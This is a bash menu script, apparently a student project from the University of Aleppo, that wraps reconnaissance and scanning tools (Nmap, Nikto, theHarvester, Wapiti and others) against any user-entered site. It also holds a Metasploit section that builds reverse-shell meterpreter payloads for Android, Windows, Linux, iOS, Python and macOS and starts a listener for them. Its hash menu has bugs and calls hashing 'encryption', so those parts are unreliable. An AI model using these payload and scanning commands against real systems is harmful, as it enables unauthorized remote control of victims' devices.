#!/bin/bash

clear

cmatrix -s
x=0;
while [ $x -le 5 ]
do
figlet EEEF -w 50000 -f Epic -d /usr/share/figlet-fonts | lolcat --freq=0.5 -t --speed=1000
sleep 0.1
clear
x=$(($x+1))
done

#sudo pip install wordlist
########################################
#This is Blod color
green='\e[1;32m'
cyan='\e[1;36m'
red='\e[1;31m'
blue='\e[1;34m'
white='\e[1;37m'
yellow='\e[1;33m'
purple='\e[1;35m'
########################################
clear




figlet EEEF -w 50000 -f Electronic -d /usr/share/figlet-fonts | lolcat --freq=0.5 -t --speed=1000

########################################




########################################
echo ""

echo  -e $white "                          Please Press Enter To Start  "
read Enter
clear

echo -e $white "           An analytical Study & Simulation Of Hacking Computer Systems       " | lolcat -a -i #-d 50
echo ""
echo ""
echo -e "       $white<<<$red   The Script By : <Ranim Sallat>--<Sedra Zaytoun>  $white>>>"
echo ""
echo ""
echo  -e $blue "Universty Of Aleppo"
echo        " -------------------"
echo  -e $blue "Elctrical & Elctronic Engineering Faculty|Telecommunications Department"
echo        " -----------------------------------------------------------------------"
echo ""
echo ""
echo  -e $white "             }--------------------------------------------------{"
echo ""
echo ""
echo  -e $red "{1}--"$white" Collection of information"
echo
echo  -e $red "{2}--"$white" Metasploit"
echo
echo  -e $red "{3}--"$white" Hash"
echo
echo  -e $red "{0}--"$white" Exit"
echo
read -p "Enter the Number: " UI
######################################
if [ "$UI" = 0 ]
	then
	clear	
	figlet  Bye Bye  | lolcat -a -d 5 -i
fi
###################################################################
if [ "$UI" = 1 ]
	then
	clear
	echo  -e $red
	echo "██╗███╗   ██╗███████╗ ██████╗ ██████╗  █████╗ ███╗   ███╗████████╗██╗ ██████╗ ███╗   ██╗";
	echo "██║████╗  ██║██╔════╝██╔═══██╗██╔══██╗██╔══██╗████╗ ████║╚══██╔══╝██║██╔═══██╗████╗  ██║";
	echo "██║██╔██╗ ██║█████╗  ██║   ██║██████╔╝███████║██╔████╔██║   ██║   ██║██║   ██║██╔██╗ ██║";
	echo "██║██║╚██╗██║██╔══╝  ██║   ██║██╔══██╗██╔══██║██║╚██╔╝██║   ██║   ██║██║   ██║██║╚██╗██║";
	echo "██║██║ ╚████║██║     ╚██████╔╝██║  ██║██║  ██║██║ ╚═╝ ██║   ██║   ██║╚██████╔╝██║ ╚████║";
	echo "╚═╝╚═╝  ╚═══╝╚═╝      ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝╚═╝     ╚═╝   ╚═╝   ╚═╝ ╚═════╝ ╚═╝  ╚═══╝";
	echo "                                                                                        ";
	echo ''
	echo  -e $red"1-$green Maltego                         | $red 5-$green Nikto "
	echo ""
	echo  -e $red"2-$green Whatweb                         | $red 6-$green Nmap  "
	echo ""
	echo  -e $red"3-$green Dmitry                          | $red 7-$green Wapiti  "
	echo ""
	echo  -e $red"4-$green The Harvester                   | $red 8-$green Httrack  "
	echo ""
	echo  -e $red"99-$green BACK"
	echo
	read -p "Entre The Number: " name
	if [ $name = 99 ]
		then
		clear
		bash eeef
	fi
	if [ $name = 1 ]
		then
		clear
		echo  -e $red
		echo ""
		echo "███╗   ███╗ █████╗ ██╗  ████████╗███████╗ ██████╗  ██████╗ ";
		echo "████╗ ████║██╔══██╗██║  ╚══██╔══╝██╔════╝██╔════╝ ██╔═══██╗";
		echo "██╔████╔██║███████║██║     ██║   █████╗  ██║  ███╗██║   ██║";
		echo "██║╚██╔╝██║██╔══██║██║     ██║   ██╔══╝  ██║   ██║██║   ██║";
		echo "██║ ╚═╝ ██║██║  ██║███████╗██║   ███████╗╚██████╔╝╚██████╔╝";
		echo "╚═╝     ╚═╝╚═╝  ╚═╝╚══════╝╚═╝   ╚══════╝ ╚═════╝  ╚═════╝ ";
		echo "                                                           ";
		echo  -e $red
		echo ""
		echo  -e $white "{1}- Maltego tool Installation"
		echo ""
		echo  -e $white "{2}- Open Maltego"
		echo ""
		echo  -e $white "{3}- Back"
		echo ""
		echo ""
		echo ""
		read MALTEGO
		if [  $MALTEGO = 00 ]
			then
			clear
			bash eeef
		fi
		if [ $MALTEGO = 1 ]
			then
			echo ""
			echo ""
			echo "Please wait a little..."
			sleep 2
			sudo apt install maltego
		fi
		if [ $MALTEGO = 2 ]
			then
			echo ""
			echo ""
			echo "Loading..."
			sleep 2
			maltego
		fi
		if [ $MALTEGO = 3 ]
			then
			clear
			bash eeef
		fi
	fi
	if [ $name = 2 ]
		then
		clear
		echo  -e $red
		echo ""
		echo "██╗    ██╗██╗  ██╗ █████╗ ████████╗██╗    ██╗███████╗██████╗ ";
		echo "██║    ██║██║  ██║██╔══██╗╚══██╔══╝██║    ██║██╔════╝██╔══██╗";
		echo "██║ █╗ ██║███████║███████║   ██║   ██║ █╗ ██║█████╗  ██████╔╝";
		echo "██║███╗██║██╔══██║██╔══██║   ██║   ██║███╗██║██╔══╝  ██╔══██╗";
		echo "╚███╔███╔╝██║  ██║██║  ██║   ██║   ╚███╔███╔╝███████╗██████╔╝";
		echo " ╚══╝╚══╝ ╚═╝  ╚═╝╚═╝  ╚═╝   ╚═╝    ╚══╝╚══╝ ╚══════╝╚═════╝ ";
		echo "                                                             ";
		echo  -e $red
		echo ""
		echo  -e $white "{1}- Whatweb tool Installation  "
		echo ""
		echo  -e $white "{2}- Start Collecting The Informations"
		echo ""
		echo  -e $white "{3}- Back"
		echo ""
		echo ""
		echo ""
		read WHATWEB
		if [ $WHATWEB = 1 ]
			then
			echo "Please wait a little..."
			echo ""
			echo ""
			sleep 2
			sudo apt install whatweb
		fi
		if [ $WHATWEB = 2 ]
			then
			echo "Please enter the website you want to check"
			echo ""
			echo ""
			read url
			sleep 2
			whatweb -v $url
		fi
		if [ $WHATWEB = 3 ]
			then
			clear
			bash eeef
		fi
	fi
	if [ $name = 3 ]
		then
		clear
		echo  -e $red
		echo ""
		echo "██████╗ ███╗   ███╗██╗████████╗██████╗ ██╗   ██╗";
		echo "██╔══██╗████╗ ████║██║╚══██╔══╝██╔══██╗╚██╗ ██╔╝";
		echo "██║  ██║██╔████╔██║██║   ██║   ██████╔╝ ╚████╔╝ ";
		echo "██║  ██║██║╚██╔╝██║██║   ██║   ██╔══██╗  ╚██╔╝  ";
		echo "██████╔╝██║ ╚═╝ ██║██║   ██║   ██║  ██║   ██║   ";
		echo "╚═════╝ ╚═╝     ╚═╝╚═╝   ╚═╝   ╚═╝  ╚═╝   ╚═╝   ";
		echo "                                                ";
		echo  -e $red
		echo ""
		echo  -e $white "{1}- Dmitry Tool Installation"
		echo ""
		echo  -e $white "{2}- Start By checking the site"
		echo ""
		echo  -e $white "{3}- Start checking the Sub Domains associated with the site"
		echo ""
		echo  -e $white "{4}- Back"
		echo ""
		echo ""
		echo ""
		echo ""
		read DMITRY
		if [ $DMITRY = 1 ]
			then
			echo "Please wait..."
			echo ""
			echo ""
			sleep 2
			sudo apt install dmitry
		fi
		if [ $DMITRY = 2 ]
			then
			echo "Please Enter The Site Domain You Want To Check : "
			echo ""
			echo ""
			read url
			sleep 2
			dmitry -w $url
		fi
		if [ $DMITRY = 3 ]
			then
			echo "Please Enter The Site Domain You Want To Check : "
			echo ""
			echo ""
			read url
			sleep 2
			dmitry -s $url
		fi
		if [ $DMITRY = 4 ]
			then
			clear
			bash eeef
		fi
	fi
	if [ $name = 4 ]
		then
		clear
		echo -e $red
		echo ""
		echo "                                                                         ";
		echo " _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ ";
		echo "|_   _|  |  |   __|  |  |  _  | __  |  |  |   __|   __|_   _|   __| __  |";
		echo "  | | |     |   __|     |     |    -|  |  |   __|__   | | | |   __|    -|";
		echo "  |_| |__|__|_____|__|__|__|__|__|__|\___/|_____|_____| |_| |_____|__|__|";
		echo "                                                                         ";
		echo  -e $red
		echo ""
		echo  -e $white "{1}- The Harvester Tool Installation"
		echo ""
		echo  -e $white "{2}- Start Collecting Informations"
		echo ""
		echo  -e $white "{3}- Back"
		echo ""
		echo ""
		read THEHARVESTER
		if [ $THEHARVESTER = 1 ]
			then
			echo "Please wait a little..."
			echo ""
			echo ""
			sleep 2
			sudo apt install theharvester
		fi
		if [ $THEHARVESTER = 2 ]
			then
			echo "Please enter the website you want to check"
			echo ""
			echo ""
			read url
			sleep 2
			theHarvester -d $url -l 500 -b duckduckgo
		fi
		if [ $THEHARVESTER = 3 ]
			then
			clear
			bash eeef
		fi
	fi
	if [ $name = 5 ]
		then
		clear
		echo  -e $red
		echo ""
		echo "███╗   ██╗██╗██╗  ██╗████████╗ ██████╗ ";
		echo "████╗  ██║██║██║ ██╔╝╚══██╔══╝██╔═══██╗";
		echo "██╔██╗ ██║██║█████╔╝    ██║   ██║   ██║";
		echo "██║╚██╗██║██║██╔═██╗    ██║   ██║   ██║";
		echo "██║ ╚████║██║██║  ██╗   ██║   ╚██████╔╝";
		echo "╚═╝  ╚═══╝╚═╝╚═╝  ╚═╝   ╚═╝    ╚═════╝ ";
		echo "                                       ";
		echo  -e $red
		echo ""
		echo  -e $white "1- Nikto Tool Installation"
		echo ""
		echo  -e $white "2- Start by checking"
		echo ""
		echo  -e $white "3- Back"
		echo ""
		echo ""
		read NIKTO
		if [ $NIKTO = 1 ]
			then
			echo "Please wait a little..."
			echo ""
			echo ""
			sleep 2
			sudo apt install nikto
		fi
		if [ $NIKTO = 2 ]
			then
			echo "Please Enter The Site Domain"
			echo ""
			echo ""
			read IP	
			nikto -h $IP	
		fi
		if [ $NIKTO = 3 ]
			then
			clear
			bash eeef
		fi
	fi
	if [ $name = 7 ]
		then
		clear
		echo  -e $red
		echo ""
		echo "██╗    ██╗ █████╗ ██████╗ ██╗████████╗██╗";
		echo "██║    ██║██╔══██╗██╔══██╗██║╚══██╔══╝██║";
		echo "██║ █╗ ██║███████║██████╔╝██║   ██║   ██║";
		echo "██║███╗██║██╔══██║██╔═══╝ ██║   ██║   ██║";
		echo "╚███╔███╔╝██║  ██║██║     ██║   ██║   ██║";
		echo " ╚══╝╚══╝ ╚═╝  ╚═╝╚═╝     ╚═╝   ╚═╝   ╚═╝";
		echo "                                         ";
		echo  -e $red
		echo ""
		echo  -e $white "{1}- Wapiti Tool Installation"
		echo ""
		echo  -e $white "{2}- Start by checking the site"
		echo ""
		echo  -e $white "{3}- Back"
		echo ""
		echo ""
		read WAPITI
		if [ $WAPITI = 1 ]
			then
			echo "Please wait a little..."
			echo ""
			echo ""
			sleep 2
			sudo apt install wapiti
		fi
		if [ $WAPITI = 2 ]
			then
			echo "Please the website you want to check"
			echo ""
			echo ""
			read url
			wapiti $url
		fi
		if [ $WAPITI = 3 ]
			then
			clear
			bash eeef
		fi
	fi
	if [ $name = 8 ]
		then
		clear
		echo  -e $red
		echo ""
		echo "██╗  ██╗████████╗████████╗██████╗  █████╗  ██████╗██╗  ██╗";
		echo "██║  ██║╚══██╔══╝╚══██╔══╝██╔══██╗██╔══██╗██╔════╝██║ ██╔╝";
		echo "███████║   ██║      ██║   ██████╔╝███████║██║     █████╔╝ ";
		echo "██╔══██║   ██║      ██║   ██╔══██╗██╔══██║██║     ██╔═██╗ ";
		echo "██║  ██║   ██║      ██║   ██║  ██║██║  ██║╚██████╗██║  ██╗";
		echo "╚═╝  ╚═╝   ╚═╝      ╚═╝   ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝";
		echo "                                                          ";
		echo  -e $red
		echo ""
		echo  -e $white "{1}- Httrack Tool Installation"
		echo ""
		echo  -e $white "{2}- Open Httrack"
		echo ""
		echo  -e $white "{3}- Back"
		echo ""	
		echo ""
		read HTTRACK
		if [ $HTTRACK = 1 ]
			then
			echo "Please wait a little..."
			echo ""
			echo ""
			sleep 2
			sudo apt install httrack
		fi
		if [ $HTTRACK = 2 ]
			then
			httrack
		fi
		if [ $HTTRACK = 3 ]
			then
			clear	
			bash eeef
		fi
	fi
	if [ $name = 6 ]
		then
		clear
		echo  -e $red
		echo ""
		echo "███╗   ██╗███╗   ███╗ █████╗ ██████╗ ";
		echo "████╗  ██║████╗ ████║██╔══██╗██╔══██╗";
		echo "██╔██╗ ██║██╔████╔██║███████║██████╔╝";
		echo "██║╚██╗██║██║╚██╔╝██║██╔══██║██╔═══╝ ";
		echo "██║ ╚████║██║ ╚═╝ ██║██║  ██║██║     ";
		echo "╚═╝  ╚═══╝╚═╝     ╚═╝╚═╝  ╚═╝╚═╝     ";
		echo "                                     ";
		echo  -e $red
		echo ""
		echo  -e $white "{1}- Nmap Tool Installation"
		echo ""
		echo  -e $white "{2}- Check A Site/Ip Info"
		echo ""
		echo  -e $white "{3}- Start by checking the site"
		echo ""
		echo  -e $white "{4}- Back"
		echo ""
		echo ""
		read NMAP
		if [ $NMAP = 1 ]
			then
			echo "Please wait a little..."
			echo ""
			echo ""
			sleep 2
			sudo apt install nmap
		fi
		if [ $NMAP = 2 ]
			then
			echo
			read -p "Enter The Ip Or Site: " ip
			sleep 2
			curl http://ip-api.com/$ip
		fi
		if [ $NMAP = 3 ]	
			then
			echo ""
			echo "Please place the IP address you want to check"
			echo ""
			echo ""
			read IP
			clear
			echo  "Nmap scan for:"
			echo ""
			echo  "{1}- Simple Scan [-sV]"
			echo ""
			echo  "{2}- Port Scan [-Pn]"
			echo ""
			echo  "{3}- Operating System Detection [-A]"
			echo ""
			echo  "{4}- Back"
			echo ""
			echo ""
			read scan
			if [ "$scan" = 1 ]
				then
				nmap -sV $IP
			fi
			if [ "$scan" = 2 ]
				then
				nmap -Pn $IP
			fi
			if [ "$scan" = 3 ]
				then
				nmap -A $IP
			fi
			if [ "$scan" = 4 ]
				then
				clear
				bash eeef
			fi
		fi
		if [ $NMAP = 4 ]
			then
			clear
			bash eeef
		fi
	


	fi
fi

###################################################################
if [ "$UI" = 2 ]
	then
	clear
	echo  -e $red
	echo "███╗   ███╗███████╗████████╗ █████╗ ███████╗██████╗ ██╗      ██████╗ ██╗████████╗";
	echo "████╗ ████║██╔════╝╚══██╔══╝██╔══██╗██╔════╝██╔══██╗██║     ██╔═══██╗██║╚══██╔══╝";
	echo "██╔████╔██║█████╗     ██║   ███████║███████╗██████╔╝██║     ██║   ██║██║   ██║   ";
	echo "██║╚██╔╝██║██╔══╝     ██║   ██╔══██║╚════██║██╔═══╝ ██║     ██║   ██║██║   ██║   ";
	echo "██║ ╚═╝ ██║███████╗   ██║   ██║  ██║███████║██║     ███████╗╚██████╔╝██║   ██║   ";
	echo "╚═╝     ╚═╝╚══════╝   ╚═╝   ╚═╝  ╚═╝╚══════╝╚═╝     ╚══════╝ ╚═════╝ ╚═╝   ╚═╝   ";
	echo "                                                                                 ";
	echo
	echo  -e $red"1-"$green" Payload For Android"
	echo
	echo  -e $red"2-"$green" Payload For Windows"
	echo
	echo  -e $red"3-"$green" Payload For Linux"
	echo
	echo  -e $red"4-"$green" Payload For IOS"
	echo
	echo  -e $red"5-"$green" Python Payload"
	echo
	echo  -e $red"6-"$green" Payload For Mac"
	echo
	echo  -e $red"0-"$green" Back"
	echo
	read -p "Enter the Number: " payload
	if [ $payload = 0 ]
		then
		clear
		bash eeef
	fi
	if [ $payload = 1 ]
		then
		echo
		read -p "Enter The Host: " host
		read -p "Enter The Port: " port
		read -p "Enter the Name Of The Payload: " name
	sudo msfvenom -p android/meterpreter/reverse_tcp LHOST=$host LPORT=$port R > ~/Desktop/$name.apk
	sudo msfconsole -x 'use exploit/multi/handler' -x 'set payload android/meterpreter/reverse_tcp'
	fi
	if [ $payload = 2 ]
		then
		echo
		read -p "Enter The Host: " host
		read -p "Enter The Port: " port
		read -p "Enter the Name Of The Payload: " name
		sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=$host LPORT=$port -f exe -o ~/Desktop/$name.exe
		sudo msfconsole -x 'use exploit/multi/handler' -x 'set payload windows/meterpreter/reverse_tcp'
	fi
	if [ $payload = 3 ]
		then
		echo
		read -p "Enter The Host: " host
		read -p "Enter The Port: " port
		read -p "Enter the Name Of The Payload: " name
		sudo msfvenom -p linux/x86/meterpreter/reverse_tcp -f elf LHOST=$host LPORT=$port -o ~/Desktop/$name.elf
		sudo msfconsole -x 'use exploit/multi/handler' -x 'set payload linux/x86/meterpreter/reverse_tcp'
	fi
	if [ $payload = 4 ]
		then
		echo
		read -p "Enter The Host: " host
		read -p "Enter The Port: " port
		read -p "Enter the Name Of The Payload: " name
		sudo msfvenom -p apple_ios/aarch64/meterpreter_reverse_tcp LHOST=$host LPORT=$port -o ~/Desktop/$name.api
		sudo msfconsole -x 'use exploit/multi/handler' -x 'set payload apple_ios/aarch64/		meterpreter_reverse_tcp'
	fi
	if [ $payload = 5 ]
		then	
		echo ""
		read -p "Enter The Host: " host
		read -p "Enter The Port: " port
		read -p "Enter the Name Of The Payload: " name
		sudo msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=$host LPORT=$port R> ~/Desktop/$name.py
		sudo msfconsole -x 'use exploit/multi/handler' -x 'set payload python/meterpreter/reverse_tcp'
	fi
	if [ $payload = 6 ]
		then
		echo
		read -p "Enter The Host: " host
		read -p "Enter The Port: " port
		read -p "Enter the Name Of The Payload: " name
		sudo msfvenom -p osx/x64/meterpreter_reverse_tcp -f macho LHOST=$host LPORT=$port -o ~/Desktop/$name.macho
		sudo msfconsole -x 'use exploit/multi/handler' -x 'set payload osx/x64/meterpreter_reverse_tcp'
	fi
fi
######################################
if [ "$UI" = 3 ]
	then
	clear
	echo  -e $red "Select the type of encryption method"
	echo  -e $green
	echo "1- md5            |       4- sha512             "
	echo "2- sha1           |       5- sha256             "
	echo "3- sha224         |       6- sha384             "
	echo "0- Back"
	echo ""
	read hash
	if [ $hash = 1 ]
		then
		echo "Enter the word to encrypt"
		read $name1
		echo "$name1" | md5sum
		echo  $red
		read -p 'Enter any kay to back' a
	fi
	if [ $hash = 2 ]
		then
		echo "Enter the word to encrypt"
		read $name2
		echo "$name2" | sha1sum
		echo  -e $red
		read -p 'Enter any kay to back' a
	fi
	if [ $hash = 3 ]
		then
		echo "Enter the word to encrypt"
		read $name3
		echo "name3" | sha224sum
		echo  -e $red
		read -p 'Enter any kay to back' a
	fi
	if [ $hash = 4 ]
		then
		echo "Enter the word to encrypt"
		read $name4
		echo "$name4" | sha512sum
		echo  -e $red
		read -p 'Enter any kay to back' a
	fi
	if [ $hash = 5 ]
		then
		echo "Enter the word to encrypt"
		read $name5
		echo "$name5" | sha256sum
		echo  -e $red
		read -p 'Enter any kay to back' a
	fi
	if [ $hash = 6 ]
		then
		echo "Enter the word to encrypt"
		read $name6
		echo "$name6" | sha384sum
		echo  -e $red
		read -p 'Enter any kay to back' a
	fi
	if [ $hash = 0 ]
		then
		clear
		bash eeef
	fi


fi
